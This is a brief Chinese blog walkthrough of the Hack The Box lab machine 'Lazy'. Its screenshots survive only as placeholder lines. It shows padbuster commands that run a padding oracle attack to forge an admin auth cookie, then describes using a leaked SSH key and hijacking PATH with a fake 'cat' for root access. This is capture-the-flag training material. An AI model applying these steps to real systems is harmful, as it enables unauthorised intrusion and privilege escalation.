Hack the box靶机 Lazy

在这里插入图片描述
在这里插入图片描述

提示先创建一个账号

在这里插入图片描述

注册后登录
没啥用啊
抓包看看

在这里插入图片描述

将Auth cookie 的值更改为lienzhen
收到错误消息
容易受到Oracle Padding Attack的攻击。
Padding Oracle Attack

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

padbuster http://10.10.10.18/login.php XTofxP4m83U7wSdzi%2FY9Gn7YjhxcJeEf 8 -cookies auth=XTofxP4m83U7wSdzi%2FY9Gn7YjhxcJeEf -encoding 0
padbuster http://10.10.10.18/login.php XTofxP4m83U7wSdzi%2FY9Gn7YjhxcJeEf 8 -cookies auth=XTofxP4m83U7wSdzi%2FY9Gn7YjhxcJeEf -encoding 0  -plaintext user=admin

反向推出admin的值用来登录

在这里插入图片描述
在这里插入图片描述

数值要修改两次
得到一个id_rsa

在这里插入图片描述
在这里插入图片描述

ssh登录成功
看到文件夹下有backup文件

在这里插入图片描述
在这里插入图片描述

脚本调用了cat命令
在/tmp中写一个cat
加入环境变量中
运行
拿到权限

©️2020 CSDN 皮肤主题: 大白 设计师:CSDN官方博客 返回首页